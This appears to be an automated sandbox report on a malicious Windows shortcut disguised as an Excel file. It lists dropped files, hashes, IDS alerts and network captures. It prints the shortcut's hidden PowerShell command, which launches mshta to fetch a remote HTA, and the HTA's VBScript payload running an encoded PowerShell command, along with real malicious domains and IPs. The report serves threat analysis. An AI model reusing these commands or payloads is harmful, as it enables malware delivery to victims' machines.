SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mlg4ktp.uh3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1gecwjj.nan.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5nawkyx.gfg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u21k0mxa.jz0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3v2gqbj.5kq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIGEBA1B1MCN0DFQC4KH.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5439
Entropy (8bit):	3.519300179613719
Encrypted:	false
SSDEEP:	48:Uh1BotZ5F1dCZxIXuN1zdZx/tpKAwlRsSogZoGBSNpKAwl4sSogZoGB21:UhLoPvFuN1LpKAwNH/BqpKAwOH/Bo
MD5:	604A3EC11F0F60879CC5688E66EF31B6
SHA1:	F54555E344CDFD48DAAB77093DC05EA72AC5E15E
SHA-256:	2B57E9D6ED61B263386542CB65892D4F71112B3D5A7B7CAC2889004198259A52
SHA-512:	F525182F10B82C5C791180CEFFA6FEE5D797F664C1104AB8548BEFFC70CD815063CA04FC703D4ECABB67C64D27EAD98B50DBE4842711ED0EEEE4B1D48C815913
Malicious:	false
Preview:	...................................FL..................F.`.. ...U..iL...........(B.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.......kL..............2.....nZ.j .______~1.LNK..h......gZ8TnZ.j....m.....................C.)._._._._. ._._._._._._...x.l.s...l.n.k...b.i.n...l.n.k.......a...............-.......`...........K.)......C:\Users\user\Desktop\____ ______.xls.lnk.bin.lnk..?.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.E.X.C.E.L...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\EXCEL.EXE........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.E.X.C.E.L...E.X.E..............................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b33909ca01e9e943.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5439
Entropy (8bit):	3.519300179613719
Encrypted:	false
SSDEEP:	48:Uh1BotZ5F1dCZxIXuN1zdZx/tpKAwlRsSogZoGBSNpKAwl4sSogZoGB21:UhLoPvFuN1LpKAwNH/BqpKAwOH/Bo
MD5:	604A3EC11F0F60879CC5688E66EF31B6
SHA1:	F54555E344CDFD48DAAB77093DC05EA72AC5E15E
SHA-256:	2B57E9D6ED61B263386542CB65892D4F71112B3D5A7B7CAC2889004198259A52
SHA-512:	F525182F10B82C5C791180CEFFA6FEE5D797F664C1104AB8548BEFFC70CD815063CA04FC703D4ECABB67C64D27EAD98B50DBE4842711ED0EEEE4B1D48C815913
Malicious:	false
Preview:	...................................FL..................F.`.. ...U..iL...........(B.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.......kL..............2.....nZ.j .______~1.LNK..h......gZ8TnZ.j....m.....................C.)._._._._. ._._._._._._...x.l.s...l.n.k...b.i.n...l.n.k.......a...............-.......`...........K.)......C:\Users\user\Desktop\____ ______.xls.lnk.bin.lnk..?.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.E.X.C.E.L...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\EXCEL.EXE........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.E.X.C.E.L...E.X.E..............................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 22:32:37 2009, mtime=Mon Jul 13 22:32:37 2009, atime=Tue Jul 14 00:14:24 2009, length=452608, window=hide
Entropy (8bit):	3.4833804745249153
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	____ ______.xls.lnk.bin.lnk
File size:	2'709 bytes
MD5:	b4daab40e7fdd5199b16314565bdebfd
SHA1:	cf2023322ea444d571a64449daf3507060a466c3
SHA256:	3d7b626032ae4cf35965ddddde19df6653342090b76d97bfa420b82776597a4c
SHA512:	dcb480cc4ba96fa0c05dcfbfb500bf2ff92724e40006b5b68992bdda8e33f3ee2b0f81d6206e402ca365932aa1e8d3e2154b526404467ed9abba9bfd9d2112b9
SSDEEP:	48:8v26cDog+9+ueHZmPdNZxmfDkfbN1hCZxDHeD+aS5:8+6cDYmHl+bN1eeD+
TLSH:	4151ED202BFD5B24F2FA4A354C77A7716932FD04DE209AAF0294490D6876B10D978F7B
File Content Preview:	L..................F.@.. ......4.......4.....'.l ................................P.O. .:i.....+00.../C:\...................R.1.....jZ.l..Windows.<........:..jZ.l.........................W.i.n.d.o.w.s.....V.1.....lZlu..System32..>........:..lZlu.........

File Icon


Icon Hash:	31d5a5a4a4aba98d

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	-WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"
Icon location:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-14T14:21:16.390629+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.4	49719	91.218.228.26	80	TCP
2025-03-14T14:21:22.325494+0100	2816701	ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP	1	91.218.228.26	80	192.168.2.4	49719	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 14:21:14.361875057 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:14.361913919 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:14.361980915 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:14.374660969 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:14.374696970 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.013550043 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.013624907 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.070826054 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.070847988 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.071296930 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.071381092 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.074023962 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.120316982 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.604156017 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.604300976 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.604329109 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.604392052 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.612201929 CET	49718	443	192.168.2.4	172.67.160.19
Mar 14, 2025 14:21:15.612251043 CET	443	49718	172.67.160.19	192.168.2.4
Mar 14, 2025 14:21:15.670461893 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:15.675246954 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:15.675333977 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:15.675513029 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:15.680160999 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390547037 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390564919 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390575886 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390588045 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390599012 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390610933 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390620947 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390629053 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:16.390633106 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:16.390671968 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:16.390672922 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:22.325494051 CET	80	49719	91.218.228.26	192.168.2.4
Mar 14, 2025 14:21:22.325576067 CET	49719	80	192.168.2.4	91.218.228.26
Mar 14, 2025 14:21:26.601223946 CET	49726	8443	192.168.2.4	190.2.146.205
Mar 14, 2025 14:21:26.605906010 CET	8443	49726	190.2.146.205	192.168.2.4
Mar 14, 2025 14:21:26.605993986 CET	49726	8443	192.168.2.4	190.2.146.205
Mar 14, 2025 14:21:26.653542995 CET	49726	8443	192.168.2.4	190.2.146.205
Mar 14, 2025 14:21:26.658198118 CET	8443	49726	190.2.146.205	192.168.2.4
Mar 14, 2025 14:21:30.664555073 CET	49726	8443	192.168.2.4	190.2.146.205
Mar 14, 2025 14:22:47.557029963 CET	49719	80	192.168.2.4	91.218.228.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 14:21:14.327955961 CET	57837	53	192.168.2.4	1.1.1.1
Mar 14, 2025 14:21:14.350992918 CET	53	57837	1.1.1.1	192.168.2.4
Mar 14, 2025 14:21:15.628173113 CET	54537	53	192.168.2.4	1.1.1.1
Mar 14, 2025 14:21:15.668852091 CET	53	54537	1.1.1.1	192.168.2.4
Mar 14, 2025 14:21:26.488897085 CET	52925	53	192.168.2.4	1.1.1.1
Mar 14, 2025 14:21:26.571422100 CET	53	52925	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 14, 2025 14:21:14.327955961 CET	192.168.2.4	1.1.1.1	0xa998	Standard query (0)	iplogger.cn	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:21:15.628173113 CET	192.168.2.4	1.1.1.1	0x498b	Standard query (0)	ecols.ru	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:21:26.488897085 CET	192.168.2.4	1.1.1.1	0x47af	Standard query (0)	mcnn.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 14, 2025 14:21:14.350992918 CET	1.1.1.1	192.168.2.4	0xa998	No error (0)	iplogger.cn	172.67.160.19	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:21:14.350992918 CET	1.1.1.1	192.168.2.4	0xa998	No error (0)	iplogger.cn	104.21.14.168	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:21:15.668852091 CET	1.1.1.1	192.168.2.4	0x498b	No error (0)	ecols.ru	91.218.228.26	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:21:26.571422100 CET	1.1.1.1	192.168.2.4	0x47af	No error (0)	mcnn.ru	190.2.146.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

iplogger.cn

ecols.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49719	91.218.228.26	80	7472	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Mar 14, 2025 14:21:15.675513029 CET	321	OUT	GET /ecols.hta HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Connection: Keep-Alive Host: ecols.ru
Mar 14, 2025 14:21:16.390547037 CET	1236	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: application/octet-stream last-modified: Tue, 11 Mar 2025 22:03:40 GMT etag: "1e77-67d0b33c-f90449910bed9da6;;;" accept-ranges: bytes content-length: 7799 date: Fri, 14 Mar 2025 13:21:16 GMT server: LiteSpeed Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0a 09 46 75 6e 63 74 69 6f 6e 20 76 61 72 5f 66 75 6e 63 28 29 0a 09 09 44 69 6d 20 76 61 72 5f 73 68 65 6c 6c 0a 09 09 53 65 74 20 76 61 72 5f 73 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0a 09 09 76 61 72 5f 73 68 65 6c 6c 2e 72 75 6e 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 6e 6f 70 20 2d 77 20 68 69 64 64 65 6e 20 2d 65 6e 63 6f 64 65 64 63 6f 6d 6d 61 6e 64 20 4a 41 42 7a 41 44 30 41 54 67 42 6c 41 48 63 41 4c 51 42 50 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 45 6b 41 54 77 41 75 41 45 30 41 5a 51 42 74 41 47 38 41 63 67 42 35 41 46 4d 41 64 41 42 79 41 47 55 41 59 51 42 74 41 43 67 41 4c 41 42 62 41 45 4d 41 62 77 42 75 41 48 59 41 5a 51 42 79 41 48 51 41 58 51 41 36 41 44 6f 41 52 67 42 79 41 47 38 41 62 51 42 43 41 47 45 41 63 77 42 6c 41 44 59 41 4e 41 42 54 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 49 41 53 41 41 30 41 [TRUNCATED] Data Ascii: <script language="VBScript">Function var_func()Dim var_shellSet var_shell = CreateObject("Wscript.Shell")var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFc
Mar 14, 2025 14:21:16.390564919 CET	224	IN	Data Raw: 41 54 51 42 55 41 47 49 41 62 77 41 31 41 47 4d 41 64 41 42 4a 41 48 55 41 64 67 42 52 41 46 4d 41 59 77 42 43 41 46 45 41 4e 77 42 5a 41 47 30 41 54 67 42 4a 41 47 6f 41 4e 77 42 6a 41 46 63 41 62 41 41 33 41 48 63 41 4c 77 42 51 41 46 55 41 63 Data Ascii: ATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFM
Mar 14, 2025 14:21:16.390575886 CET	1236	IN	Data Raw: 41 64 77 42 31 41 47 59 41 64 41 42 31 41 46 63 41 59 77 42 61 41 47 45 41 4c 77 42 43 41 45 73 41 56 41 42 61 41 48 63 41 61 51 42 71 41 46 55 41 4e 51 42 30 41 45 73 41 4d 77 42 44 41 47 63 41 65 41 42 7a 41 47 6f 41 64 77 42 6f 41 44 59 41 63 Data Ascii: AdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQw
Mar 14, 2025 14:21:16.390588045 CET	1236	IN	Data Raw: 61 41 46 41 41 64 41 42 49 41 47 4d 41 53 77 42 33 41 45 34 41 4e 51 41 31 41 44 51 41 51 51 42 4c 41 47 63 41 61 51 42 4b 41 43 73 41 63 51 41 35 41 47 63 41 61 67 42 74 41 47 51 41 57 51 42 78 41 44 41 41 63 51 42 43 41 47 63 41 63 67 42 69 41 Data Ascii: aAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAE
Mar 14, 2025 14:21:16.390599012 CET	1236	IN	Data Raw: 41 61 51 41 76 41 44 45 41 52 41 42 68 41 47 51 41 4f 41 42 59 41 47 51 41 4d 51 42 33 41 48 59 41 61 41 42 51 41 45 55 41 4c 77 42 77 41 45 51 41 4d 41 42 59 41 47 6f 41 61 77 42 44 41 48 55 41 4d 67 41 30 41 47 30 41 51 77 42 6d 41 48 55 41 59 Data Ascii: AaQAvADEARABhAGQAOABYAGQAMQB3AHYAaABQAEUALwBwAEQAMABYAGoAawBDAHUAMgA0AG0AQwBmAHUAYQAwAGsARABEAHEAbwBMAGwAcwBaADAAMwBTAFIAWgBaADcAeQBPACsAbgBWAHcAYgBOAEQASwBhADUASwBrACsARgBTAEQAVQBDAFIAMQA0AHkAbQBqAGgAUwBYADIAOQB6ADgAQQBuADgATQBwAHAARABuAFgAYg
Mar 14, 2025 14:21:16.390610933 CET	1236	IN	Data Raw: 6c 41 48 4d 41 53 51 42 33 41 48 6f 41 62 51 42 45 41 45 63 41 4d 67 42 5a 41 47 6f 41 52 41 42 50 41 47 63 41 4e 51 42 75 41 44 45 41 64 51 42 42 41 47 30 41 61 67 42 71 41 47 63 41 4d 67 41 76 41 48 6f 41 4d 41 41 7a 41 48 41 41 55 77 42 45 41 Data Ascii: lAHMASQB3AHoAbQBEAEcAMgBZAGoARABPAGcANQBuADEAdQBBAG0AagBqAGcAMgAvAHoAMAAzAHAAUwBEAEcAMQB3AC8ASQA0AHYAMQA2AGEAZgBuAGUAcwBZAGQAVQBFAFAASwB5AEcAbgBYAHQAVABvAEoAVQBaADMAUgA0AFAAUgBBAGsASgBHAFcAMwB4AG0AYQA5AHcAKwB0AG8AWQByAGgAVgAxAGsATABlAGkAUgA3AC
Mar 14, 2025 14:21:16.390620947 CET	1236	IN	Data Raw: 41 54 77 41 79 41 45 30 41 54 77 42 77 41 48 49 41 51 77 42 34 41 47 34 41 64 51 41 34 41 48 67 41 4e 51 42 32 41 46 6b 41 4d 51 42 54 41 47 51 41 5a 41 41 32 41 44 49 41 57 41 42 47 41 44 6b 41 53 77 42 50 41 47 4d 41 61 67 42 34 41 44 55 41 55 Data Ascii: ATwAyAE0ATwBwAHIAQwB4AG4AdQA4AHgANQB2AFkAMQBTAGQAZAA2ADIAWABGADkASwBPAGMAagB4ADUAUQBCAGQAOABmAEsATwBmAEwARwBiAFEAcABzADEASgA3AFEANgBtAFQANQB1AEIAaQB0AEcAOQB0ADIANwB1ADYASgB1AHIAYwBJAFkATwBwAEgAWAAxACsASgA2AC8AeQBkAFYARABLADQAeABvAFUANgAxAEMAUw
Mar 14, 2025 14:21:16.390633106 CET	463	IN	Data Raw: 69 41 43 38 41 51 67 42 52 41 46 41 41 61 51 42 6d 41 48 67 41 53 41 41 72 41 45 51 41 55 51 42 42 41 45 45 41 49 67 41 70 41 43 6b 41 4f 77 42 4a 41 45 55 41 57 41 41 67 41 43 67 41 54 67 42 6c 41 48 63 41 4c 51 42 50 41 47 49 41 61 67 42 6c 41 Data Ascii: iAC8AQgBRAFAAaQBmAHgASAArAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAE

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49718	172.67.160.19	443	7472	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:21:15 UTC	330	OUT	GET /forensicsas.png HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: iplogger.cn Connection: Keep-Alive
2025-03-14 13:21:15 UTC	1194	IN	HTTP/1.1 302 Found Date: Fri, 14 Mar 2025 13:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: http://ecols.ru/ecols.hta Set-Cookie: 58120481137264061=3; expires=Sat, 14 Mar 2026 13:21:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.189; expires=Sat, 14 Mar 2026 13:21:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.43221282958984375 expires: Fri, 14 Mar 2025 13:21:15 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN cf-cache-status: BYPASS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzaPzpAgQh9yBwSzrf%2FX4jLBjwq4Rh0JAh11fTcn7onz9PNIN76jUXt2b3ud30wUnMsL8NbZMDRtLeJOpq6hJl55KQASKW%2BzsnpYkQcH2orFGoA2Wr9z6mSzPLRlnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 920412b58d6a005e-EWR alt-svc: h3=":443"; ma=86400
